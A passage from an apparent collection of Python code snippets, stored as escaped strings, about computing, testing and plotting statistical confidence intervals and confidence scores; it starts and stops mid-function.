lowerBound = (xBar - yBar) - t * (spsd * (((1/m)+(1/n)) **.5))\n upperBound = (xBar - yBar) + t * (spsd * (((1/m)+(1/n)) **.5))\n \n return lowerBound, upperBound\n \n except sampleSizeError as inst:\n print(inst.args[0])\n \n except ValueError as inst:\n print(inst.args[0])", "def ci(self):\n var_assumptions = self.var_assumptions if self.var_assumptions == \"pooled\" else \"unequal\"\n ci_vals = self.comparison.zconfint_diff(self.alpha, self.hypothesis_sm, var_assumptions)\n\n return [ci_vals, self.ci_percents]", "def _nelson_aalen_ci(estimate, variance, conf_type, conf_level):\n # Standard normal quantile for normal approximation confidence intervals\n quantile = st.norm.ppf((1 - conf_level) / 2)\n\n # Compute confidence intervals at the observed event times\n if conf_type == \"linear\":\n error = quantile * np.sqrt(variance)\n lower = estimate + error\n upper = estimate - error\n elif conf_type == \"log\":\n error = np.exp(quantile * np.sqrt(variance) / estimate)\n lower = estimate * error\n upper = estimate / error\n else:\n # This should not be reachable\n raise RuntimeError(f\"Invalid confidence interval type: {conf_type}.\")\n\n # Force confidence interval lower bound to be 0\n lower = np.maximum(lower, 0.)\n\n return lower, upper", "def conf(self, success, total):\n try:\n sp = success / total\n conf = binom_conf_interval(success, total, interval='jeffreys')\n uperr = conf[1] - sp # 1 sigma confidence above mean\n loerr = sp - conf[0] # 1 sigma confidence below mean\n return sp, uperr, loerr, 0.5*(uperr+loerr)\n except ValueError as e:\n return 0, 0, 0, 0", "def confidenceInterval(model, N = 30):\n predicted_accuracies = [0]*N\n predicted_roc = [0]*N\n for i in tqdm(range(N)):\n X_train, X_test, y_train, y_test = train_test_split(X, y_binary, random_state=i)\n scaler = StandardScaler()\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n model = model.fit(X_train, y_train)\n predicted_accuracies[i] = accuracy_score(model.predict(X_test), y_test)\n predicted_roc[i] = roc_auc_score(model.predict(X_test), y_test)\n r = np.mean(predicted_roc)\n m = np.mean(predicted_accuracies)\n\n variance_roc = np.var(predicted_roc)\n variance_acc = np.var(predicted_accuracies)\n sd_acc = np.sqrt(variance_acc)\n sd_roc = np.sqrt(variance_roc)\n CI_acc = 2*sd_acc\n CI_roc = 2*sd_roc\n return m, CI_acc, r, CI_roc", "def mean_confidence_interval(data, confidence=0.95):\n\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, m-h, m+h", "def confidence(samples, confidence_level):\n mean = scipy.mean(samples)\n sdev = scipy.std(samples)\n n = len(samples)\n df = n - 1\n t = distributions.t.ppf((1+confidence_level)/2.0, df)\n interval = (interval_low, interval_high) = ( mean - t * sdev / math.sqrt(n) , mean + t * sdev / math.sqrt(n) )\n interval_size = interval_high - interval_low\n interval_percentage = interval_size / mean * 100.0\n return (interval, mean, sdev, interval_percentage)", "def ci_diff_mean_std_known(array1, array2, std1, std2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n\n # means of samples\n mean1 = np.mean(array1)\n mean2 = np.mean(array2)\n\n # size of the samples\n n1 = len(array1)\n n2 = len(array2)\n\n # difference of the two means\n diff_mean = mean1 - mean2\n\n # the z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n\n # margin of error\n margin_of_error = z_star * np.sqrt((std1 ** 2 / n1) + (std2 ** 2 / n2))\n\n # upper and lower confidence bounds\n lcb = np.round(diff_mean - margin_of_error, 2)\n ucb = np.round(diff_mean + margin_of_error, 2)\n\n print(\n \"{}% Confidence Interval for difference of two population means: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def mean_confidence_interval(data, confidence=0.95):\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), stats.sem(a)\n h = se * stats.t._ppf((1 + confidence) /2., n - 1)\n return m, m - h, m + h", "def get_confidence_interval(\n num_people,\n num_iter=1000000,\n percentile=2.576,\n num_days=365,\n):\n mean = 0.0\n variance = 0.0 # not exactly\n for i in range(1, num_iter + 1):\n x = [randint(1, num_days) for person in range(num_people)]\n x.sort()\n is_consecutive = any(p + 1 == q for (p, q) in zip(x[:-1], x[1:], strict=True))\n is_a_loop = x[0] + num_days - 1 == x[-1]\n is_positive = int(is_consecutive or is_a_loop)\n delta = is_positive - mean\n mean += delta / float(i)\n variance += delta * (is_positive - mean)\n sd = sqrt(variance / float(num_iter - 1))\n lower_bound = mean - percentile * sd / sqrt(num_iter)\n upper_bound = mean + percentile * sd / sqrt(num_iter)\n print(\n \"Number of people: {}\\tLower bound: {:2.5%}\\tUpper bound: {:2.5%}\".format(\n num_people,\n lower_bound,\n upper_bound,\n ),\n )\n return lower_bound, upper_bound", "def test_conf_interval_ecdf_method(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n\n # ``quantile_estimation_method = \"ecdf\"``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"ecdf\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n pred_df[ERR_STD_COL] = round(pred_df[ERR_STD_COL], 2)\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.32, 289.38, 291.3, 291.34), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.63, -5.56, -4.13, -4.08), (\n \"quantiles are incorrect\")\n expected_stds = [0.29, 0.42, 0.42, 0.42, 0.42, 0.58, 0.58, 0.58, 0.58, 0.58,\n 0.58, 0.42]\n assert list(pred_df[ERR_STD_COL].values) == expected_stds", "def two_proportion_confidence_interval(hits1, attempts1, hits2, attempts2, alpha=0.05):\n \n # Calculate proportions:\n proportion1 = hits1/attempts1\n proportion2 = hits2/attempts2\n difference_of_proportions = proportion1 - proportion2\n \n # Calculate standard error:\n SE = two_proportion_standard_error(hits1, attempts1, hits2, attempts2)\n \n # Save the critical value at the specified confidence:\n z_critical = stats.norm.ppf(1 - 0.5*alpha)\n \n # Calculate margin of error:\n moe = z_critical * SE\n \n # Calculate confidence intervals:\n confidence_lower = difference_of_proportions - moe\n confidence_higher = difference_of_proportions + moe\n \n return difference_of_proportions, moe, confidence_lower, confidence_higher", "def bootstrap_confidence_interval(\n arr, ci=0.95, n_bootstraps=2000, stat_fun=\"mean\", random_state=None\n):\n if stat_fun == \"mean\":\n\n def stat_fun(x):\n return x.mean(axis=0)\n\n elif stat_fun == \"median\":\n\n def stat_fun(x):\n return np.median(x, axis=0)\n\n elif not callable(stat_fun):\n raise ValueError(\"stat_fun must be 'mean', 'median' or callable.\")\n n_trials = arr.shape[0]\n indices = np.arange(n_trials, dtype=int) # BCA would be cool to have too\n rng = check_random_state(random_state)\n boot_indices = rng.choice(indices, replace=True, size=(n_bootstraps, len(indices)))\n stat = np.array([stat_fun(arr[inds]) for inds in boot_indices])\n ci = (((1 - ci) / 2) * 100, ((1 - ((1 - ci) / 2))) * 100)\n ci_low, ci_up = np.percentile(stat, ci, axis=0)\n return np.array([ci_low, ci_up])", "def boot_conf_intervals(indep,\n dep,\n estimator,\n display_name=None,\n resample_cases=False,\n significance=0.05,\n num_sims=10000,\n verbose=True,\n seed=None,\n precision=4):\n if display_name is None:\n display_name = \"\"\n\n est_params = estimator.fit(indep, dep)\n est_params = np.array(est_params)\n\n params_arr = resampling.boot_param_dist(indep=indep,\n dep=dep,\n estimator=estimator,\n num_sims=num_sims,\n resample_cases=resample_cases,\n seed=seed,\n include_fixed_params=False,\n verbose=verbose)\n\n if estimator.has_restricted_params:\n est_params = est_params[estimator.estimated_params_indices]\n\n (bca_ci_df,\n percentile_ci_df,\n basic_ci_df) = _confidence_intervals(params_arr=params_arr,\n est_params=est_params,\n significance=significance,\n estimator=estimator,\n indep=indep,\n dep=dep)\n\n if verbose:\n def my_formatter(x):\n format_str = '.' + str(precision) + 'f'\n return format(x, format_str)\n\n formatters = [my_formatter for dummy in range(len(bca_ci_df.columns))]\n\n print()\n print(\"confidence level: \", 100.0 * (1.0 - significance), \"%\")\n print()\n print(\"bootstrap bca confidence intervals\")\n print()\n print(bca_ci_df.to_string(formatters=formatters))\n# if latex:\n# print(bca_ci_df.to_latex(escape=False, formatters=formatters))\n# else:\n print(\"bootstrap percentile confidence intervals\")\n print()\n print(percentile_ci_df.to_string(formatters=formatters))\n print()\n print(\"bootstrap basic confidence intervals\")\n print()\n print(basic_ci_df.to_string(formatters=formatters))\n print()\n\n return bca_ci_df, percentile_ci_df, basic_ci_df", "def conf_interval_two_means(datae,dataf,conf):\n \n # Dataset E\n data_e = 1.0*np.array(datae)\n n_e = data_e.shape[0]*data_e.shape[1]\n mean_e = np.array(data_e).mean()\n var_e = np.array(data_e).var(ddof=1)\n df_e = n_e-1\n \n # Dataset F\n data_f = 1.0*np.array(dataf)\n n_f = dataf.shape[0]*dataf.shape[1]\n mean_f = np.array(data_f).mean()\n var_f = np.array(data_f).var(ddof=1)\n df_f = n_f-1\n \n # Sp,t calculated for lower/upper bounds \n Sp = np.sqrt((((df_e*var_e) + (df_f*var_f))/(df_e+df_f)))\n t = abs(scs.t.ppf(((1-conf)/2), (df_e+df_f)))\n lower = (mean_e-mean_f)-(Sp*t*np.sqrt(1/n_e+1/n_f))\n upper = (mean_e-mean_f)+(Sp*t*np.sqrt(1/n_e+1/n_f))\n \n return lower,upper", "def ci_diff_mean_std_unknown(array1, array2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n\n # means of samples\n mean1 = np.mean(array1)\n mean2 = np.mean(array2)\n\n # standard deviation fo samples\n std1 = np.std(array1)\n std2 = np.std(array2)\n\n # size of the samples\n n1 = len(array1)\n n2 = len(array2)\n\n # difference of the two means\n diff_mean = mean1 - mean2\n\n # degrees of freddom\n deg_fred = deg_fred_two_means(std1, std2, n1, n2)\n\n # find the t critical value\n t_star = np.round(stats.t.ppf(1 - alpha / 2, deg_fred), 3)\n\n # margin of error\n margin_of_error = t_star * np.sqrt((std1 ** 2 / n1) + (std2 ** 2 / n2))\n\n # upper and lower confidence bounds\n lcb = np.round(diff_mean - margin_of_error, 2)\n ucb = np.round(diff_mean + margin_of_error, 2)\n\n print(\n \"{}% Confidence Interval for difference of two population means: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def plot_confidence(self, level = None, show = False):\n try: # Check to see if intervals have been calculated, already\n if level and level != self.interval_control['level']:\n self.confidence_intervals(level = level)\n else:\n level = self.interval_control['level']\n except: # If not, calculate them\n if level == None:\n level = 95\n self.confidence_intervals(level = level)\n\n int_control = [self.interval_control[k] for k in ['lower','upper']]\n int_treatment = [self.interval_treatment[k] for k in ['lower','upper']]\n\n low_end = min(int_control[0], int_treatment[0])\n high_end = max(int_control[1], int_treatment[1])\n r = high_end - low_end\n low_lim = low_end - (0.1 * r)\n high_lim = high_end + (0.1 * r)\n\n data = [\n go.Scatter(\n mode = 'lines+markers',\n line = dict(color = 'blue', width = 4),\n marker = dict(color = 'black', size = 10, symbol = 'line-ns-open'),\n x = int_control,\n y = [0.75 for i in range(len(int_control))],\n name = 'Control'\n ),\n go.Scatter(\n mode = 'lines+markers',\n line = dict(color = 'orange', width = 4),\n marker = dict(color = 'black', size = 10, symbol = 'line-ns-open'),\n x = int_treatment,\n y = [1.25 for i in range(len(int_treatment))],\n name = 'Treatment'\n )\n ]\n\n layout = dict(\n title = '{}% Confidence Intervals, Treatment vs Control'.format(level),\n plot_bgcolor = 'white',\n height = 350,\n width = 800,\n xaxis = dict(title = 'Probabilities',\n range = (low_lim, high_lim),\n showgrid = False,\n zeroline = False,\n showline = True,\n linecolor = 'black',\n tickformat = ',.0%'),\n yaxis = dict(range = (0,2),\n showgrid = False,\n zeroline = False,\n showline = True,\n linecolor = 'black',\n visible = False)\n )\n\n fig = go.Figure(data = data, layout = layout)\n\n if show:\n fig.show()\n\n return fig", "def plot_confidence_interval_for_variable (model, X, y, variable):\n\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n X_ds_new = X.copy()\n X_ds_new['actual'] = y\n X_ds_new['pred'] = np.mean(preds, axis=1)\n X_ds_new['pred_std'] = np.std(preds, axis=1)\n\n X_ds_grp = X_ds_new.groupby(variable)['actual', 'pred', 'pred_std'].agg('mean')\n X_ds_grp['count'] = X_ds_new[variable].value_counts()\n\n print (f'Average Predicted value and Std Dev by : {variable}')\n display(X_ds_grp)\n print ('')\n print (f'Distribution of Predicted value by : {variable}')\n sns.catplot(x=variable, y='pred', data=X_ds_new, kind='box')\n plt.show()", "def find_confidence(self, t, df):\n t_table = self.t_table\n nearest_df = round(find_nearest(t_table.index, df), 0)\n nearest_t = round(find_nearest(t_table.loc[nearest_df], t), 6)\n for col in list(t_table):\n if nearest_t == round(t_table[col][nearest_df], 6):\n # Subtract from one to get confidence, divide by two to get\n # single section on positive side of distribution.\n confidence = (1.0 - float(col)) / 2.0\n return confidence", "def generate_confidence(self):\n conf_score = np.random.normal(self.speech_conf_mean,\n self.speech_conf_std)\n conf_score = round(conf_score, 2)\n conf_score = max(conf_score, 0.0) # >= 0.\n conf_score = min(conf_score, 1.0) # <= 1.\n return conf_score", "def calc_conf(deviation, tolerance, mape):\n return (1 - ((mape / 100) * (deviation/tolerance))) * 100", "def confidence(s, p):\r\n p = Basic.sympify(p)\r\n assert p <= 1\r\n\r\n d = (s.b-s.a)*p / 2\r\n return (s.mean - d, s.mean + d)", "def confidence_at_98tpr(self):\r\n\r\n return self.confidence_at_tpr(0.98)", "def generate_confidence_interval(ranking):\n nodes = list()\n for x in ranking:\n if x:\n nodes.extend(x[1].keys())\n ci = dict.fromkeys(set(nodes))\n for node in ci:\n # first constuct array of ranking\n ranks = [_catch(x[1], node) for x in ranking if _catch(x[1], node)]\n if len(ranks) == 1:\n ci[node] = (np.nan, np.nan)\n else:\n mean, se, m = np.mean(ranks), sem(ranks), t.ppf((1 + 0.95) / 2., len(ranks) - 1)\n interval = (mean - m*se, mean + m*se)\n # confidence intervals below 0 or above 1 are meaningless\n if interval[0] < 0:\n interval = (0, interval[1])\n if interval[1] > 1:\n interval = (interval[0], 1)\n ci[node] = interval\n return ci", "def plot_confidence(x, Y, confidence=0.95, shade_color=\"#3498db\", line_color=\"#34495e\"):\n y, lb, ub = zip(*[mean_confidence_interval(Y[:, j], confidence) for j in range(Y.shape[1])])\n plt.fill_between(\n range(Y.shape[1]),\n lb, ub,\n color=shade_color\n )\n plt.plot(range(Y.shape[1]), y, lw=2, color=line_color)", "def confidence_at_95tpr(self):\r\n\r\n return self.confidence_at_tpr(0.95)", "def does_ci_narrow(mean1, ci1, mean2, ci2):\n\n assert ci1 >= 0.0 and ci2 >= 0.0, 'Found negative confidence interval from bootstrapping.'\n if abs(ci1 - ci2) < CI_MINIUM_SIGNIFICANT_NARROWING:\n return SAME\n x1 = mean1 - ci1\n y1 = mean1 + ci1\n x2 = mean2 - ci2\n y2 = mean2 + ci2\n return does_interval_narrow((x1, y1), (x2, y2))", "def test_conf_interval_normal_method(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.14, -4.88, -3.24, -2.98), (\n \"quantiles are incorrect\")", "def get_min_confidence(self):\n return self.__min_confidence", "def find_confidence(self, chi2, df):\n chi2_table = self.chi2_table\n nearest_df = round(find_nearest(chi2_table.index, df), 0)\n nearest_chi2 = round(find_nearest(chi2_table.loc[nearest_df], chi2), 6)\n for col in list(chi2_table):\n if nearest_chi2 == round(chi2_table[col][nearest_df], 6):\n # Subtract from one to get confidence.\n confidence = (1.0 - float(col))\n return confidence", "def test_robbins_confidence(self):\n c = array([1,2,3,0,1])\n r = robbins_confidence(c, 0.05)\n n = 7\n s = 2\n k = sqrt(8/0.05)\n self.assertEqual(r, ((s-k)/(n+1), (s+k)/(n+1)))", "def confidence_at_995tpr(self):\r\n\r\n return self.confidence_at_tpr(0.995)", "def getConfidence(self,LeftTup,RightTup):\n\n tup=LeftTup+RightTup\n _intersection=self.getSupport(tup)\n _LHS=self.getSupport(LeftTup)\n _confidence=_intersection/_LHS\n return (_confidence)", "def compare_confints(confidence_intervals, index_verbose=False):\n\n n_features = len(confidence_intervals[0].keys())\n features_limes = []\n for conf_int in confidence_intervals:\n features_limes.append(conf_int.keys())\n unique_features = list(set([l for ll in features_limes for l in ll]))\n\n # Calculate CSI\n overlapping_tot = []\n for feat in unique_features:\n conf_int_feat = []\n for conf_int in confidence_intervals:\n if conf_int.get(feat):\n conf_int_feat.append(conf_int.get(feat))\n\n if len(conf_int_feat) < 2:\n pass\n else:\n overlapping = []\n for pair_intervals in combinations(conf_int_feat, 2):\n i1, i2 = pair_intervals\n is_overlap = True if (i1[0] < i2[1] and i2[0] < i1[1]) else False\n overlapping.append(is_overlap)\n frac_overlapping = round(sum(overlapping) / len(overlapping) * 100, 2)\n overlapping_tot.append(frac_overlapping)\n if index_verbose:\n print(\"\"\"Percentage of overlapping confidence intervals, variable {}: {}%\\n\"\"\".format(\n feat, frac_overlapping))\n\n csi = round(np.mean(overlapping_tot), 2)\n\n # Calculate VSI\n same_vars = 0\n n_combs = 0\n for pair_vars in combinations(features_limes, 2):\n var1, var2 = pair_vars\n same_vars += len(set(var1) & set(var2))\n n_combs += 1\n vsi = round(same_vars / (n_combs * n_features) * 100, 2)\n if index_verbose:\n print(\"\"\"Percentage same variables across repeated LIME calls: {}%\\n\"\"\".format(vsi))\n\n return csi, vsi", "def confidence(self):\n\n choices = self.choices\n\n # Get the chi-squared between the top two choices, if more than two choices exist\n if len(choices) >= 2:\n csq = chi_squared(*choices)\n confident = is_confident(csq, len(choices)) if len(choices) <= 10 else None\n else:\n csq = None\n confident = False\n\n return (csq, confident)", "def min_confidence(self) -> float:\n return self._min_confidence", "def cal_confidence(dat):\n\n\talpha = 40.0\n\tconfidence = np.zeros(dat.shape)\n\tconfidence = 1 + alpha * dat\n\treturn np.matrix(confidence)", "def _get_model_confidence_mean(self, exog, alpha=0.1):\n\n res = self._model.fit()\n\n y_fit = self._model.predict(res.params, exog=exog)\n\n u_ci = np.empty(y_fit.shape)\n l_ci = np.empty(y_fit.shape)\n\n x_prime_x_inverse = np.linalg.inv(np.dot(self._model.exog.transpose(), self._model.exog))\n\n t_ppf_value = stats.t.ppf(1 - alpha / 2, self._model.df_resid)\n\n for i in range(len(u_ci)):\n leverage = np.dot(exog[i, :], np.dot(x_prime_x_inverse, exog[i, :]))\n\n interval_distance = t_ppf_value * np.sqrt(res.mse_resid * leverage)\n\n u_ci[i] = y_fit[i] + interval_distance\n l_ci[i] = y_fit[i] - interval_distance\n\n return y_fit, l_ci, u_ci", "def get_confidence(cls, X, y=None):\n scores = []\n for metric_wrapper, weight in cls.confidence_computation.items():\n scores.append(metric_wrapper.calculate(X) * weight)\n return sum(scores)", "def detection_confidence(self):\n return self._detection_confidence", "def confidence_at_99tpr(self):\r\n\r\n return self.confidence_at_tpr(0.99)", "def confidence(self, value):\n if not self.can_update():\n self._handle_error(910, [self.type])\n request_data = {'confidence': value}\n return self.tc_requests.update(\n self.api_type, self.api_branch, self.unique_id, request_data, owner=self.owner\n )", "def test_conf_interval_normal_method_with_bounds(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n # with enforced lower limit (``min_admissible_value``)\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=290.0,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.0, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (290.0, 290.0, 290.0, 290.0), (\n \"quantiles are incorrect\")", "def ci_prop(p, n, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n # standard error\n std_error = np.sqrt(p * (1 - p) / n)\n # find the z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n # margin of error\n margin_of_error = np.round(z_star * std_error, 2)\n # calculate lower and upper confidence bounds\n lcb = np.round(p - margin_of_error, 2)\n ucb = np.round(p + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Proportion: ({}, {})\".format(\n conf_level, lcb, ucb\n )\n )", "def test_conf_interval_normal_method_no_conditionals(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``;\n # with no ``conditional_cols``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=None,\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.05, 290.37, 292.42, 292.74), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.41, -5.08, -3.04, -2.72), (\n \"quantiles are incorrect\")", "def calc_confidence(self, last_n_matches=None):\n if last_n_matches is None:\n # use all the matches\n last_n_matches = len(self.slopes)\n\n # only start processing once we've gotten a few frames\n if len(self.matches_per_frame) < self.min_frames:\n return\n \n # calculate confidence interval of the slope of the last N matches\n np_slopes = np.array(self.slopes[-last_n_matches:])\n m = np.mean(np_slopes)\n se = scipy.stats.sem(np_slopes)\n h = se * scipy.stats.t.ppf((1+self.confidence)/2.0, len(np_slopes)-1)\n\n # update class variables\n self.confidence_interval = [m-h, m+h]\n self.rho = m", "def create_interval_NEW(confidence, samples=False, n_samples=False, sample_mean=False, sd=False, true_std=False, is_prob=False, is_normal=False, side=\"both\"):\n h = 0\n\n if samples:\n n_samples = len(samples)\n sample_mean = float(np.mean(samples))\n sd = float(np.std(samples))\n std_err = float(st.sem(samples))\n else:\n if sd is False and n_samples < 30:\n raise Exception(\"confidence intervals\", \"Missing standard deviation to estimate mean with less than 30 samples.\")\n else:\n std_err = sd / math.sqrt(n_samples)\n\n if side == \"both\":\n alpha = (1 - confidence) / 2\n z = st.norm.ppf(1 - (1 - confidence) / 2)\n t = st.t.ppf((1 + confidence) / 2, n_samples - 1)\n else:\n alpha = (1 - confidence)\n z = st.norm.ppf(1 - (1 - confidence))\n t = st.t.ppf((1 + confidence), n_samples - 1)\n\n if is_prob: ## CI for probabilities\n if sample_mean == 0: ## Rule of three\n return Interval(0, 3/n_samples)\n elif sample_mean == 1: ## Rule of three\n return Interval(1 - 3/n_samples, 1)\n elif n_samples >= 30: ## Binomial proportion confidence interval: Normal/Gaussian distribution of the proportion: https://machinelearningmastery.com/confidence-intervals-for-machine-learning/\n h = z * math.sqrt((sample_mean * (1 - sample_mean)) / n_samples)\n elif n_samples < 30:\n interval = st.bayes_mvs(samples, confidence)[0][1] ## 0 is the mean, 1 is the interval estimate\n return Interval(interval[0], interval[1])\n ## h = t * math.sqrt((mean * (1 - mean)) / n_samples) ## TODO, check this\n else: ## CI for usual values\n if (n_samples >= 30 or is_normal) and true_std is not False: ## use Normal Distribution\n h = z * true_std / math.sqrt(n_samples)\n elif is_normal: ## use Student distribution\n # h = t * s / math.sqrt(n_samples)\n h = t * std_err\n else:\n interval = st.bayes_mvs(samples, confidence)[0][1] ## 0 is the mean, 1 is the interval estimate\n return Interval(interval[0], interval[1])\n\n h = float(h)\n if side == \"both\":\n return Interval(sample_mean - h, sample_mean + h)\n elif side == \"right\":\n if is_prob:\n return Interval(0, sample_mean + h)\n else:\n return Interval(float('-inf'), sample_mean + h)\n else:\n if is_prob:\n return Interval(sample_mean - h, 1)\n else:\n return Interval(sample_mean - h, float('inf'))", "def test_conf_interval_normal_method_no_small_sample_calc(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``;\n # with no small sample size calculation\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=None,\n small_sample_size_method=None,\n small_sample_size_quantile=None,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.64, -5.26, -2.86, -2.49), (\n \"quantiles are incorrect\")", "def robbins_confidence(counts, alpha=0.05):\n s = singles(counts)\n n = counts.sum()\n k = sqrt((n+1)/alpha)\n return (s-k)/(n+1), (s+k)/(n+1)", "def confidence_at_tpr(self, tpr):\r\n\r\n assert self.validation_confidences is not None\r\n assert tpr > 0\r\n\r\n # true positives are correctly classified examples\r\n if self.sorted_correct_validation_confidences is None:\r\n correct_validation_confidences = self.validation_confidences[numpy.logical_not(self.validation_errors)]\r\n self.sorted_correct_validation_confidences = numpy.sort(numpy.copy(correct_validation_confidences))\r\n # rounding is a hack see tests\r\n cutoff = math.floor(self.sorted_correct_validation_confidences.shape[0] * round((1 - tpr), 2))\r\n assert cutoff >= 0\r\n assert cutoff < self.sorted_correct_validation_confidences.shape[0]\r\n return self.sorted_correct_validation_confidences[cutoff]", "def _calculate_covariance_error(self, lc_x, lc_y):\n # Excess Variance of reference band\n xs_x = self._calculate_excess_variance(lc_x)\n # Standard deviation of light curve\n err_y = self._calculate_std(lc_y)\n # Excess Variance of reference band\n xs_y = self._calculate_excess_variance(lc_y)\n # Standard deviation of light curve\n err_x = self._calculate_std(lc_x)\n # Number of time bins in lightcurve\n N = lc_x.ncounts\n # Number of segments averaged\n if not self.avg_covar:\n M = 1\n else:\n M = self.nbins\n\n num = xs_x*err_y + xs_y*err_x + err_x*err_y\n denom = N * M * xs_y\n\n return (num / denom)**0.5", "def state_confidences(self, X: List[np.ndarray], **kwargs) -> List[np.ndarray]:", "def __call__(self, observation, precision_digits=None, search_region=None):\n if precision_digits is None:\n precision_digits = self.precision_digits\n if search_region is None:\n search_region = [0, round_to_digits(10 + 3 * len(observation), precision_digits)]\n if self.statistic.mu_dependent:\n value = self.statistic(observation, self.statistic.mus)\n else:\n value = self.statistic(observation, None)\n self.log.debug(\"Statistic evaluates to %s\" % value)\n return self.get_confidence_interval(value, precision_digits=precision_digits, search_region=search_region)", "def compute_ci(yhat, yhat_var, ci_level):\n z_mapping = {0.95: 1.96,\n 0.99: 2.58}\n z = z_mapping[ci_level]\n\n ci_lower = yhat - yhat_var * z\n ci_upper = yhat + yhat_var * z\n\n return ci_lower, ci_upper", "def computeCI(cov, mean):\n mult = 2\n sd = np.diag(cov)**(0.5)\n lower = mean - (mult*sd).reshape(-1,1)\n upper = mean + (mult*sd).reshape(-1,1)\n return lower, upper", "def calc_confidence_level(self, z_value):\n\n confidence_level = 0.5 * (1 + math.erf(z_value/2**0.5))\n\n return confidence_level", "def test_diff_count_precision():\n dump = False # setting to True implies results printed and test fails\n seed = 123456789\n bs_samples = 1000\n alpha = 0.025 # implies 95% confidence interval\n # compute stderr and confidence interval for STANDARD bin 10 increase count\n data_list = [111.5421] * 287 + [0.0] * (10570 - 287)\n assert len(data_list) == 10570\n data = 